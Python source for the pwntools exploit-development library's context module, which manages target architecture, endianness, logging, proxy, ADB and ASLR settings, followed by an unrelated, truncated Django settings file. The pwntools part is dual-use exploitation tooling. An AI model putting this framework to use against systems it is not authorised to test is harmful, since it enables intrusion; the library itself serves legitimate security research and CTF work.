return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print(t)
{'key': 'value'}
>>> def p(): print(t)
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
Validator that is tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
class Thread(threading.Thread):
"""
Instantiates a context-aware thread, which inherit its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
Threads created by using the native :class`threading`.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print(context.arch)
... context.arch = 'mips'
... print(context.arch)
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print(context.arch)
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print(context.arch)
arm
Implementation Details:
This class implemented by hooking the private function
:func:`threading.Thread._Thread_bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass.self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
sup = super(Thread, self)
bootstrap = getattr(sup, '_bootstrap', None)
if bootstrap is None:
sup.__bootstrap()
else:
bootstrap()
_bootstrap = __bootstrap
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> pwnlib.context._longest(data) == data
True
>>> for i in pwnlib.context._longest(data):
... print(i)
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable :data:`.context`, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print(enhex(pwnlib.asm.asm('nop')))
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'buffer_size': 4096,
'cyclic_alphabet': string.ascii_lowercase.encode(),
'cyclic_size': 4,
'delete_corefiles': False,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'encoding': 'auto',
'endian': 'little',
'gdbinit': "",
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'rename_corefiles': True,
'newline': b'\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'signed': False,
'terminal': tuple(),
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android','baremetal'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
'none': {},
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(self.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print(context.timeout)
1.0
>>> with context.local(timeout = 2):
... print(context.timeout)
... context.timeout = 3
... print(context.timeout)
2.0
3.0
>>> print(context.timeout)
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower."""
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
def quietfunc(self, function):
"""Similar to :attr:`quiet`, but wraps a whole function."""
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.clear()
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'baremetal', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armv7l', 'arm'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = self.architectures[arch]
except KeyError:
raise AttributeError('AttributeError: arch must be one of %r' % sorted(self.architectures))
for k,v in defaults.items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If :const:`False`, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
Even then, this doesn't matter much -- only when the the segment
registers need to be known
"""
with self.local(arch=arch):
return self.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
Infer target architecture, bit-with, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from pwnlib.elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
self.os = binary.os
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits // 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits // 8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def encoding(self, charset):
if charset == 'auto':
return charset
if ( b'aA'.decode(charset) != 'aA'
or 'aA'.encode(charset) != b'aA'):
raise ValueError('Strange encoding!')
return charset
def _encode(self, s):
if isinstance(s, (bytes, bytearray)):
return s # already bytes
if self.encoding == 'auto':
try:
return s.encode('latin1')
except UnicodeEncodeError:
return s.encode('utf-8', 'surrogateescape')
return s.encode(self.encoding)
def _decode(self, b):
if self.encoding == 'auto':
try:
return b.decode('utf-8')
except UnicodeDecodeError:
return b.decode('latin1')
except AttributeError:
return b
return b.decode(self.encoding)
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in self.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(self.endiannesses))
return self.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically it controls the filtering of messages that happens
inside the handler for logging to the screen. So if you want e.g. log
all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
level_names = filter(lambda x: isinstance(x,str), logging._levelNames)
permitted = sorted(level_names)
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> context.log_file = 'foo.txt' #doctest: +ELLIPSIS
>>> log.debug('Hello!') #doctest: +ELLIPSIS
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file='bar.txt'):
... log.debug('Hello from bar!')
>>> log.info('Hello from foo!')
>>> open('foo.txt').readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> open('foo.txt').readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> open('foo.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> open('bar.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (bytes, six.text_type)):
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not hasattr(value, "fileno"):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'baremetal', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in self.oses:
raise AttributeError("os must be one of %r" % self.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag that lots of things should be randomized.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signed-ness for packing operation when it's not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'`` which are converted into
:const:`True` and :const:`False` correspondingly.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = self.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(self.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (bytes, six.text_type)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set
to the default 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set
to the default 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, (bytes, six.text_type)):
device = Device(device)
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb.
Unless ``$ADB_PATH`` is set, uses the default ``adb`` binary in ``$PATH``.
"""
ADB_PATH = os.environ.get('ADB_PATH', 'adb')
command = [ADB_PATH]
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
@_validator
def buffer_size(self, size):
"""Internal buffer size to use for :class:`pwnlib.tubes.tube.tube` objects.
This is not the maximum size of the buffer, but this is the amount of data
which is passed to each raw ``read`` syscall (or equivalent).
"""
return int(size)
@property
def cache_dir(self):
"""Directory used for caching data.
Note:
May be either a path string, or :const:`None`.
Example:
>>> cache_dir = context.cache_dir
>>> cache_dir is not None
True
>>> os.chmod(cache_dir, 0o000)
>>> context.cache_dir is None
True
>>> os.chmod(cache_dir, 0o755)
>>> cache_dir == context.cache_dir
True
"""
xdg_cache_home = os.environ.get('XDG_CACHE_HOME') or \
os.path.join(os.path.expanduser('~'), '.cache')
if not os.access(xdg_cache_home, os.W_OK):
return None
cache = os.path.join(xdg_cache_home, '.pwntools-cache-%d.%d' % sys.version_info[:2])
if not os.path.exists(cache):
try:
os.mkdir(cache)
except OSError:
return None
# Some wargames e.g. pwnable.kr have created dummy directories
# which cannot be modified by the user account (owned by root).
if not os.access(cache, os.W_OK):
return None
return cache
@_validator
def delete_corefiles(self, v):
"""Whether pwntools automatically deletes corefiles after exiting.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``False``.
"""
return bool(v)
@_validator
def rename_corefiles(self, v):
"""Whether pwntools automatically renames corefiles.
This is useful for two things:
- Prevent corefiles from being overwritten, if ``kernel.core_pattern``
is something simple like ``"core"``.
- Ensure corefiles are generated, if ``kernel.core_pattern`` uses ``apport``,
which refuses to overwrite any existing files.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``True``.
"""
return bool(v)
@_validator
def newline(self, v):
"""Line ending used for Tubes by default.
This configures the newline emitted by e.g. ``sendline`` or that is used
as a delimiter for e.g. ``recvline``.
"""
return six.ensure_binary(v)
@_validator
def gdbinit(self, value):
"""Path to the gdbinit that is used when running GDB locally.
This is useful if you want pwntools-launched GDB to include some additional modules,
like PEDA but you do not want to have GDB include them by default.
The setting will only apply when GDB is launched locally since remote hosts may not have
the necessary requirements for the gdbinit.
If set to an empty string, GDB will use the default `~/.gdbinit`.
Default value is ``""``.
"""
return str(value)
@_validator
def cyclic_alphabet(self, alphabet):
"""Cyclic alphabet.
Default value is `string.ascii_lowercase`.
"""
# Do not allow multiple occurrences
if len(set(alphabet)) != len(alphabet):
raise AttributeError("cyclic alphabet cannot contain duplicates")
return alphabet.encode()
@_validator
def cyclic_size(self, size):
"""Cyclic pattern size.
Default value is `4`.
"""
size = int(size)
if size > self.bytes:
raise AttributeError("cyclic pattern size cannot be larger than word size")
return size
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global :class:`.ContextType` object, used to store commonly-used pwntools settings.
#:
#: In most cases, the context is used to infer default variables values.
#: For example, :func:`.asm` can take an ``arch`` parameter as a
#: keyword argument.
#:
#: If it is not supplied, the ``arch`` specified by ``context`` is used instead.
#:
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> context.clear()
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
arch = context.arch
bits = context.bits
endian = context.endian
# Prevent the user from doing silly things with invalid
# architecture / bits / endianness combinations.
if (arch == 'i386' and bits != 32) \
or (arch == 'amd64' and bits != 64):
raise AttributeError("Invalid arch/bits combination: %s/%s" % (arch, bits))
if arch in ('i386', 'amd64') and endian == 'big':
raise AttributeError("Invalid arch/endianness combination: %s/%s" % (arch, endian))
return function(*a, **kw)
return setter
def LocalNoarchContext(function):
"""
Same as LocalContext, but resets arch to :const:`'none'` by default
Example:
>>> @LocalNoarchContext
... def printArch():
... print(context.arch)
>>> printArch()
none
"""
@functools.wraps(function)
def setter(*a, **kw):
kw.setdefault('arch', 'none')
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
return function(*a, **kw)
return setter
# Read configuration options from the context section
def update_context_defaults(section):
# Circular imports FTW!
from pwnlib.util import safeeval
from pwnlib.log import getLogger
log = getLogger(__name__)
for key, value in section.items():
if key not in ContextType.defaults:
log.warn("Unknown configuration option %r in section %r" % (key, 'context'))
continue
default = ContextType.defaults[key]
if isinstance(default, six.string_types + six.integer_types + (tuple, list, dict)):
value = safeeval.expr(value)
else:
log.warn("Unsupported configuration option %r in section %r" % (key, 'context'))
# Attempt to set the value, to see if it is value:
try:
with context.local(**{key: value}):
value = getattr(context, key)
except (ValueError, AttributeError) as e:
log.warn("Could not set context.%s=%s via pwn.conf (%s)", key, section[key], e)
continue
ContextType.defaults[key] = value
register_config('context', update_context_defaults)
|
settings_20210906113250.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:32").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
# def func():
# while True:
# print("======Runnning==========")
# schedule.run_pending()
# time.sleep(1)
# t1 = threading.Thread(target=func)
# t1.start()
schedule.run_pending()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
